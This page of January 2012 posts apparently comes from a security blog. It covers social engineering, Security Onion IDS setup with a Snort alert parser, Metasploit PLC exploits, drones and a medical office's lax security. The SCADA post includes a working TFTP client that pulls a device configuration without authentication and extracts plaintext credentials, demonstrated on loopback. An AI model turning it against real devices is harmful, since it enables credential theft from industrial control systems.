Hackers Targeting Social Media Sites for Social Engineering Attacks

•January 26, 2012 • 2 Comments

Hackers using Social Engineering attacks are getting much better at their craft, and people are making it very easy for them. A Social Engineer will use information gathered about a person, place or business in specially crafted attacks that play on people’s thoughts, beliefs or emotions.

But how do they get personal information that they could use against someone?

Drum roll please…

Social Media sites!

“No way”, you say, “I only give friends, colleagues and people I know access to my Facebook page.” Do you really? I mean come on, let’s be honest. We have all seen them, people with 500, 1000, even 2000 people or more on their friends list. Do they really know all those people?

People are human, and humans are always into popularity contests. It reminds me of the TV commercial where the daughter is sitting in front of her computer with hundreds of friends on her social media site. And she is making fun of her parents who have like 5 on their site, but then it shows the parents out kayaking (or something like that) with friends.

Hackers are using this very weakness of the human psyche to gain pertinent and sometimes very personal information about a person. But how you ask?

How about LinkedIn? Do you get connection requests from people you have never heard of who “know you” from some website, share your likes or dislikes, or attended the same conference? Hackers are gaining full technical backgrounds, co-worker names, titles and even full resumes using this very simple tactic.

It also works on Facebook. Except here, social engineers gain personal information about you. Everything from news about your family, your interests (sports, clubs, etc), heck some even go as far as to tell you their travel plans and even food preferences. Sometimes a lucky hacker will even get the daily itinerary of a very trusting individual.

How could they leverage this information in an attack?

Simple. From LinkedIn they could craft an e-mail saying they are from some company that you worked with or for. Or from Facebook, that they are from your kid’s school or from one of the many clubs that you attend, and have scheduling or other important “news”. All this in an attempt to get you to click on a link that leads to a malware-infested site or to open a PDF file that contains a backdoor trojan.

A friend recently received an e-mail supposedly from the technical support department for a product that he actually owned. It was about an important update, and the link for the update led to a site that tried several browser exploits in attempts to install remote access malware. It was very believable; luckily, the broken English in the e-mail made him think twice before he visited the site.

How do you protect yourself from these types of attacks?

It is always best to actually know or have met the person that you are allowing into your social media circles. Limit the level of personal information that you place on these sites. And be very careful telling people your schedules. Do your 2000+ friends really need to know that you will be out of the country for 2 weeks and what airline you will use and what hotel you will be staying at?

Just some things to think about. Hackers are getting much better using Social Engineering attacks. A little discretion will go a long way.

Security Onion Intrusion Detection System Basic Setup Tutorial

•January 24, 2012 • 4 Comments

Security Onion is one of my favorite tools. Doug Burks did an amazing job pulling together many of the top open source Network Security Monitoring (NSM) and Intrusion Detection System (IDS) programs. You can run Security Onion in Live CD mode, or you can install it and run it from your hard drive.

It’s based on Xubuntu 10.04 and contains a ton of programs including Snort, Suricata, Sguil, Squert, argus, Xplico, tcpreplay, scapy, hping, and many other security tools. Sounds complicated right? Well, Doug has done the hard work in pulling all these tools together into an easy to use Linux distribution.

Run this on a system that has two network cards and you have a complete NSM/IDS system. One NIC is the sniffing interface: connect it to a network tap or a switch SPAN/mirror port so that it sees every packet coming in or going out of the segment you are watching. It carries no IP address of its own, so nothing on the wire can talk to it. The second NIC is the management interface on your LAN side, and is what you use to remotely view and monitor intrusion attempts and security threats.
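Once the sniffing NIC is feeding Snort or Suricata, the alerts land in the fast-format alert log that Sguil and Squert read. The parser below is an added example for this post, not part of Security Onion or of the setup video: it parses a handful of constructed fast-format alert lines, counts hits per signature and lists the source addresses behind the higher-priority alerts, the sort of first check you would do from the management side. The sample alert lines, their rule IDs and the addresses in them are constructed for the demo.

```python
"""Parse Snort/Suricata 'fast' alert lines and summarise them.

Added example for this post; not Security Onion code. The alert lines
below are constructed to match the Snort fast-alert layout, not captured
from a real sensor.
"""
import re
from collections import Counter

# timestamp  [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {proto} src:port -> dst:port
FAST_ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<cls>[^\]]+)\]\s+)?"      # absent for rules with no classtype
    r"\[Priority:\s+(?P<pri>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>\S+?)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>\S+?)(?::(?P<dport>\d+))?$"  # ICMP has no ports
)

SAMPLE_ALERTS = [  # constructed for the demo; sids 1000001+ are the 'local rules' range
    "01/24-09:15:32.123456  [**] [1:1000001:2] LOCAL ATTACK_RESPONSE id check returned root [**] "
    "[Classification: Potentially Bad Traffic] [Priority: 1] {TCP} 10.0.0.5:80 -> 192.168.1.10:51234",
    "01/24-09:16:01.000001  [**] [1:1000002:1] LOCAL SCAN SIP scanner [**] "
    "[Classification: Attempted Information Leak] [Priority: 2] {UDP} 203.0.113.7:5060 -> 192.168.1.10:5060",
    "01/24-09:16:05.500000  [**] [1:1000002:1] LOCAL SCAN SIP scanner [**] "
    "[Classification: Attempted Information Leak] [Priority: 2] {UDP} 203.0.113.7:5061 -> 192.168.1.11:5060",
    "01/24-09:17:44.250000  [**] [1:1000003:1] LOCAL ICMP echo from outside [**] "
    "[Priority: 3] {ICMP} 198.51.100.9 -> 192.168.1.1",
    "this line is not an alert",
]


def parse_fast_alert(line):
    """Return a dict of the alert's fields, or None if the line is not a fast-format alert."""
    m = FAST_ALERT_RE.match(line.strip())
    if not m:
        return None
    alert = m.groupdict()
    for key in ("gid", "sid", "rev", "pri"):
        alert[key] = int(alert[key])
    for key in ("sport", "dport"):
        alert[key] = int(alert[key]) if alert[key] is not None else None
    return alert


def parse_alerts(lines):
    """Parse every line, silently dropping anything that is not an alert."""
    return [a for a in map(parse_fast_alert, lines) if a is not None]


def count_by_signature(alerts):
    """How often each (gid, sid, msg) fired; a quick way to spot a noisy rule."""
    return Counter((a["gid"], a["sid"], a["msg"]) for a in alerts)


def noisy_sources(alerts, max_priority=2):
    """Source addresses behind alerts at or above max_priority (Snort: 1 is the most severe)."""
    return Counter(a["src"] for a in alerts if a["pri"] <= max_priority)


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    for sig, n in count_by_signature(parsed).most_common():
        print(n, sig)
    print("sources with priority <= 2 alerts:", dict(noisy_sources(parsed)))
```

Feed it `/var/log/snort/alert` (or whatever path the sensor writes its fast alerts to) and adjust `max_priority` to taste; the regex deliberately treats the Classification bracket and the port numbers as optional, since rules without a classtype and ICMP alerts omit them.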

The exceptional basic setup video above was created by Adrian Crenshaw, aka “Irongeek”. Adrian has always done an amazing job passing on information about the latest security tools and techniques. Irongeek.com has a ton of videos and security how-tos; check it out!

Hakin9 Magazine Features “Pulling Passwords from Memory Dump” Article

•January 23, 2012 • 2 Comments

Hakin9 is well known in the security circles and is just a great magazine. It is known as “A magazine for IT security professionals by IT security professionals”. It covers some of the latest information on attack and defense tactics that are out there.

For those of you who are not familiar with Hakin9, the Worldwide IT Security magazine started in 2005 and is released 4 times a month:

  • Hakin9 (release date: 1st of each month) – 50 pages of content dedicated to IT security, a few regular columns written by specialists
  • Hakin9 Mobile (release date: 7th of each month) – 40 pages of content devoted to hacking and security of mobile devices and applications
  • Hakin9 Extra (release date: 15th of each month) – 50 pages of strictly topical content dedicated each time to a different hot security topic
  • Exploiting Software (release date: 22nd of each month) – 40 pages of content dedicated to the latest software exploits and security

This month’s Exploiting Software magazine has some interesting articles including:

Starting to Write Your Own Linux Shellcode
Buffer Overflow Exploitation A to Z
Anatomy of the Black Hole Exploit Kit
Hacking Applets: A Reverse Engineering Approach
The Gentoo Hardened Project: Or How to Minimize Exploits Risks

And, forgive me for some shameless self promotion, How to Recover Passwords from a Memory Dump.

How to Recover Passwords from a Memory Dump

Malware analysis is an amazing field. To be able to grab a memory dump from a live machine and then have the capability to pull useful information from it just amazes the author. Can we find pertinent system settings, and even pull information from them? Were you ever curious about what could be done with a memory dump of an active computer? This article is a short demonstration of how to acquire a memory dump from a running system, and then how to use tools not only to recover the system password hashes from the memory dump, but also to crack them.

The Hakin9 article I wrote is based on the memory forensics topics & hash cracking posts that have been covered recently here on CyberArms. I am pretty excited about it, and hope you like it too.

Check it out!

Hacking PLC SCADA Systems Easy as Pushing a Button

•January 20, 2012 • 3 Comments

Interesting news yesterday from Digital Bond and Rapid7: PLC exploits have been added to the Metasploit security testing platform. HD Moore, developer of the Metasploit project, had this to say on Twitter:

According to the Rapid7 blog, the following exploits that target General Electric’s D20 PLCs have been added to Metasploit:

  • d20pass : This module leverages a pretty major information disclosure for the device — turns out, anyone who connects to the TFTP server on the D20 can snag the complete configuration for the device, which includes plaintext usernames and passwords. This module does just that — downloads the configuration file, parses out the credentials, and stores them in Metasploit’s database for reuse.
  • d20tftpdb : This module demonstrates an asynchronous backdoor functionality in the D20 via the TFTP interface. Again, in an unauthenticated way, anyone can connect to the TFTP server, and issue commands by writing to a special location on the filesystem. Also again, this is a pretty big deal. Note that this module is currently still in the unstable Metasploit branch pending a little more QA work on getting this (pretty unique) command and channel all nice and automated. As is, though, it works just fine for demonstration purposes, and if you have some of these PLCs in your environment, you are encouraged to investigate this more (and send patches!).

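The d20pass information leak boils down to a plain TFTP read request that the device answers without asking who you are. Below is an added example of that exchange, not code from Rapid7, Digital Bond or Metasploit: a minimal RFC 1350 read client, plus a loopback thread that plays the part of a device serving its configuration to anyone who asks, and a credential grep over what comes back. The file name, the config contents and the user=/pass= layout are constructed for the demo and are not the D20’s real format. Pointed at a real host and port, `tftp_get` is the check you would run to see whether a device in your own environment hands out files unauthenticated.

```python
"""Minimal TFTP read (RRQ) client and a loopback 'device' that serves its
config without authentication.

Added example for this post; not Rapid7's d20pass module. File name,
config contents and credential layout are constructed for the demo.
"""
import re
import socket
import struct
import threading

OP_RRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 3, 4, 5
BLOCK = 512                                    # RFC 1350 data block size

# Constructed stand-in for a device config that leaks plaintext credentials.
FAKE_CONFIG = (b"# demo device config (constructed)\n"
               b"hostname=rtu-demo\n"
               b"user=operator pass=Plaintext1\n"
               b"user=admin pass=Sup3rvisor\n" + b"x" * 600 + b"\n")
CRED_RE = re.compile(rb"user=(\S+)\s+pass=(\S+)")


def tftp_get(host, port, filename, timeout=2.0):
    """Read `filename` over TFTP with no credentials; returns bytes or raises OSError."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(struct.pack("!H", OP_RRQ) + filename.encode() + b"\0octet\0", (host, port))
        data, expected, peer = b"", 1, None
        while True:
            pkt, addr = s.recvfrom(4 + BLOCK)
            if peer is None:
                peer = addr                    # server replies from a fresh port (its TID)
            elif addr != peer:
                continue                       # ignore datagrams from anyone else
            op, = struct.unpack("!H", pkt[:2])
            if op == OP_ERROR:
                code, = struct.unpack("!H", pkt[2:4])
                raise OSError("TFTP error %d: %s" % (code, pkt[4:].rstrip(b"\0").decode(errors="replace")))
            if op != OP_DATA:
                continue
            block, = struct.unpack("!H", pkt[2:4])
            s.sendto(struct.pack("!HH", OP_ACK, block), peer)   # ACK duplicates as well
            if block != expected:
                continue
            data += pkt[4:]
            expected += 1
            if len(pkt) - 4 < BLOCK:           # short block terminates the transfer
                return data
    finally:
        s.close()


def _serve_once(lsock, files):
    """Answer one RRQ on lsock; no authentication, which is the whole point."""
    pkt, client = lsock.recvfrom(1024)
    op, = struct.unpack("!H", pkt[:2])
    name = pkt[2:].split(b"\0")[0].decode(errors="replace")
    tx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # new port per transfer
    tx.settimeout(2.0)
    try:
        body = files.get(name) if op == OP_RRQ else None
        if body is None:
            tx.sendto(struct.pack("!HH", OP_ERROR, 1) + b"File not found\0", client)
            return
        block = 1
        while True:
            chunk = body[(block - 1) * BLOCK:block * BLOCK]
            tx.sendto(struct.pack("!HH", OP_DATA, block) + chunk, client)
            tx.recvfrom(4)                     # wait for the ACK (no retransmit in this demo)
            if len(chunk) < BLOCK:
                return
            block += 1
    finally:
        tx.close()
        lsock.close()


def start_fake_device(files):
    """Bind a loopback UDP port and serve one request from a background thread."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    lsock.bind(("127.0.0.1", 0))
    lsock.settimeout(5.0)
    t = threading.Thread(target=_serve_once, args=(lsock, files), daemon=True)
    t.start()
    return lsock.getsockname()[1], t


def extract_creds(config):
    """Pull user/password pairs out of the (constructed) config format."""
    return [(u.decode(), p.decode()) for u, p in CRED_RE.findall(config)]


def demo():
    port, t = start_fake_device({"config.txt": FAKE_CONFIG})
    creds = extract_creds(tftp_get("127.0.0.1", port, "config.txt"))
    t.join(2.0)
    return creds


if __name__ == "__main__":
    print(demo())
```

The client honours the one TFTP rule that trips up hand-rolled probes: the DATA packets come back from a different port than the one you sent the RRQ to, and ACKs must go to that new port. The fix on the device side is not a cleverer client; it is not exposing the TFTP service (or the configuration) to the network at all.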
With the media hype of “CyberWar” and the news of hacker attacks against critical infrastructure systems, this is a shocking move by the Metasploit team. But maybe that is what they intended.

Metasploit is used for network security and penetration testing, and it is very good. There are automated options in Metasploit that will try numerous exploits against a system and give you a remote shell if one of them works. Taking this technology and adding in PLC exploits is truly scary, or should I say, push button easy.

Just last month the FBI released the news that infrastructure systems of three US cities were hacked:

“We just had a circumstance where we had three cities, one of them a major city within the US, where you had several hackers that had made their way into Scada systems within the city.” And, “Essentially it was an ego trip for the hacker because he had control of that city’s system and he could dump raw sewage into the lake, he could shut down the power plant at the mall – a wide array of things.”

The problem is, even though people who run PLC devices in a SCADA environment have had years of warnings, many systems are still woefully unprotected, some even using default passwords. And many of these systems can be found using simple online search tools.

Most likely the thinking behind publicly releasing a tool to automate PLC exploits is that it will force companies to lock down their SCADA systems, as Dale Peterson, founder of Digital Bond states:

“We felt it was important to provide tools that showed critical infrastructure owners how easy it is for an attacker to take control of their system with potentially catastrophic results. These attacks have existed in theory for a while, but were difficult to demonstrate to a Plant Manager. By creating exploit modules for the most widely used exploit framework – Metasploit – we hope that security professionals in critical infrastructure companies, consultants, and penetration testers will prod vendors to add basic security measures to PLCs after decades of neglect.”

Hopefully this tactic works and the good guys are the ones using the tools.

The Military’s Cutting Edge Robots and Drones

•January 19, 2012 • Leave a Comment

Cyber war is all the rage now, but advanced persistent threats are not the only cool thing that happens when you marry hardware and software together. Check out some of the latest tech that is coming down the pipe to a battlefield near you:

US Army A160 Hummingbird VTOL UAS

By early summer, the US Army will deploy three of these robotic helicopters to Afghanistan.

“The U.S. Army is using a hybrid-type acquisition approach to develop a helicopter-like, Vertical-Take-Off-and-Landing Unmanned Aerial System with a so-called ARGUS wide-area surveillance sensor suite designed to beam back information and images of the surrounding terrain, service officials said.”

This unmanned eye in the sky will come packing a whopping 1.8-gigapixel color camera, and will be able to scan an area of about 25 miles.

“To provide a sense of just how high-resolution this sensor is, Leininger compared it to a standard cell phone camera. A cell phone image typically runs between 1 million and 2 million pixels. With ARGUS-IS, it’s 900 to 1,800 times that number — enough to track people and vehicles from altitudes above 20,000 feet.”

USMC Kaman K-Max

This unmanned cargo helicopter is already in service in Afghanistan. Two were sent in August of last year for battlefield trials. One successfully completed an actual mission last month.

They will be used for resupplying troops in hard to get to or dangerous locations. The K-Max can be flown remotely or the more traditional way requiring a pilot:

“K-MAX, which employs a unique counter-rotating, dual-rotor design that eliminates the need for a tail rotor, is capable of lifting 6,000 pounds, or nearly its own weight. Originally designed as a manned civilian craft, K-MAX has been modified by Lockheed to operate with or without a pilot onboard.”

The goal in Afghanistan is to reduce the number of manned convoys. Drone vehicles could eventually account for a large portion of resupply missions:

“Pratson has said a single K-MAX helicopter could reduce reliance on convoys to resupply forward operating bases in Afghanistan by 6 percent. At that volume, a fleet of 16 to 20 aircraft theoretically could handle 100 percent of the resupply mission in Afghanistan, although that isn’t the plan for now.”

Robots of the Future

The military has already made heavy use of robots in detecting and disposing of explosives and IEDs. But the push is on to make these robots even more autonomous and intelligent. The Space and Naval Warfare Systems Center Pacific is working with the Naval EOD technology division to create the next generation of robots.

According to the Department of the Navy’s October-December 2011 issue of CHIPS magazine, color and infrared technologies will be used to map an area and detect hostile targets or suspicious devices:

“The Autonomous Robotic Mapping System (ARMS), for example, can automatically explore an unknown or hostile environment while building a highly accurate and detailed map. A scanning laser rangefinder measures distance to all surrounding objects within a 360-degree field of view, and stereo cameras assist with three-dimensional rendering. No human guidance is necessary, other than initial high level direction telling the robot where to search.”

Military drones and robots currently save lives and with the demand for more and better platforms, they will increasingly take over more common and dangerous tasks making our troops safer and more effective.

China’s “Online Blue Army” Ready

•January 16, 2012 • 2 Comments

(Photo/China Daily, mod.gov.cn)

According to the China News Service (ECNS), China is a victim in cyberwar and needs to develop a strong security force to defend itself from further attacks. Hence the “Online Blue Army” has been created and is ready for cyber warfare.

Using rhetoric similar to that of the Cold War Soviet Union, CNS paints China as a developing nation trying to defend itself against international threats.

When I was a child growing up I heard numerous times that the Soviet Union needed so many nuclear missiles to protect its vast land mass from aggressors. Everyone knew, though, that the large missile stockpile was more of a threat than a safety net. It seems that China may be trying to play the same card.

Granted, China has the most internet users, about 485 million. That is a lot of users, especially when compared to the US, which sits at #2 with 245 million. The scary part is that the US already has about 80% of its population connected, whilst China is only about 40% connected. And by sheer number of users alone, China would have a large number of virus infections.

But is China the victim that they claim? ECNS states, “China can be described as merely a computer user with a fairly fragile Internet security system. These are circumstances that cry out for the build up of Internet security forces.”, and, “China is a defender in the cyber war battlefield, fending off the ‘information warfare’ and ‘media warfare’ of others...”

Not likely. China has faced international condemnation from numerous nations that claim China has not only infiltrated key networks, but has also exfiltrated government and military secrets. Yet they claim that the “Online Blue Army” will help defend China’s military internet and that it is only in an “entry level” state:

Li Li, a military expert at the National Defense University, told the People’s Daily that compared with the online military units of Western countries, China’s “Online Blue Army” is currently at its fledgling stage, and applied more in online maneuver mode than as an organic, large-scale online army.

Though the article denies that the “Blue Army” tag has any relevance, in military war games the “Red Team” is normally the aggressor force, and the “Blue Team” is usually the defending force or “good guys”.

China already has a very strong cyber capability. I am really not sure what they are trying to prove or who they are trying to deceive by this obvious propaganda piece, but we are not buying it.

Iran Builds New Drone – And So Can You

•January 11, 2012 • 2 Comments

We have all heard about Iran claiming to bring down the American stealth drone with a sophisticated cyber attack. According to their claim, they somehow tracked our RQ-170 stealth drone, deciphered our military GPS system, blocked our communication to the drone, then spoofed the GPS signal making the drone think that it was returning to base, and finally landed it with minimal damage.

Now that they have it, they are trying to convince us that they can extract data from the encrypted on-board database, reverse engineer the drone and use the technology to make their own UAV drones that are comparable or superior to those of the US.

But how advanced is Iran’s home grown UAV program?

An Iranian college recently released information on a UAV that they have created:

At first it looks like a full size Learjet, until you notice the car in the background. Another thing that stands out on this homegrown Iranian drone is the word “Honda” on the side.

Hmm… Either this means “Death to America” in Farsi or could China be helping them build a new class of advanced drones?

Apparently you too can have your own Advanced Iranian UAV. Our researchers have found not only a blueprint for the classified design, but a complete parts kit and instruction manual (written in English!):

You can even buy one for yourself or a friendly third world country.

Tell them Ahmadinejad referred you for a 10% discount! Order in the next 15 minutes and get the new Ahmadinejad bobble head doll with realistic “Death to America” action.

Act now, supplies are limited!

(Okay, before my inbox gets flooded with e-mails, the CIA starts to investigate me or Model RC Planes Inc. gets hit with angry people who want a 10% discount or an Ahmadinejad bobble head doll, this is just a joke!  :) )

Medical Office Insecurity – HIPAA Gone Wild

•January 10, 2012 • Leave a Comment

I had to take a relative out of town to see a specialist at a “more modern and up to date” medical facility. Apparently the local award winning hospital was just not good enough. And you can tell he was a specialist, because the hour wait to get into an examination room was followed by another hour waiting to be actually seen by the doctor for 5 minutes.

While I was there I was shocked by the lengths that they went to to enforce HIPAA privacy. No longer do you wait in a cattle line to check in. No way, you waited in a lobby with your hands folded gently in your lap for your number to be called. And when the glorious bank teller like receptionist finally called you, you hesitantly approached the exalted one and waited behind a line painted on the floor ten feet from the desk.

Just in case you missed the bright yellow line and the painted feet showing you where to stand, signs posted everywhere stated in a draconian font, “For patient safety, stand behind the painted line until called, or you will be shot.” Or something like that. I guess they didn’t want you to see that the receptionist was on Facebook before they were ready for you.

Each receptionist window had wide blinds installed so that you couldn’t see anything going on at the next receptionist window. And each computer monitor had a privacy screen to protect that classified patient data.

Once in the exam room all seemed to change though. The nurse dutifully checked my relative’s vitals, logged into the Windows XP computer in the room and entered all the information into their online system. She then told us the doctor would be in to see us within the next month or so and left the room.

Sitting there pondering life for what seemed like an eternity, I noticed several things. One, she seemed to stay logged into the patient database when she left the room. Two, no password protected screen saver kicked in. Three, she left the logged in system unattended in a room with patients for literally about an hour. Four, when the doctor finally graced us with his presence, he did not log in, just moved the mouse to turn off the screen saver and started viewing my relative’s file.

Finally, when we left, we had to go to the billing window. Again, the wait behind the line nonsense. Then the billing window with the privacy dividers and screens. As I stood there while my relative paid the co-pay, I looked at the wall beside the checkout clerk. In plain sight was a note that stated:

Wireless Password: (And it listed a Password)

John XXXXX – IT Tech Support guy
XXXXXXXX – Tech Support Company Name
XXX-XXXX – Tech Support Phone Number

Okay, noticing that the billing workstations seemed to be connected wirelessly, one could assume that the listed password was indeed the password used to connect to the wireless network. Also, the listing of the tech support person’s name, company and phone number is a social engineer’s dream.

The Bible verse, “Strain at a gnat, but swallow a camel” really came to mind when we left. They went to exorbitant lengths to protect individual patient privacy, but then left the keys to the kingdom out in plain view. Hopefully this isn’t an example of every doctor’s office, but a little knowledge about how a social engineer attacks a network would go a long way toward protecting not just one patient’s privacy, but the security of the whole patient database.
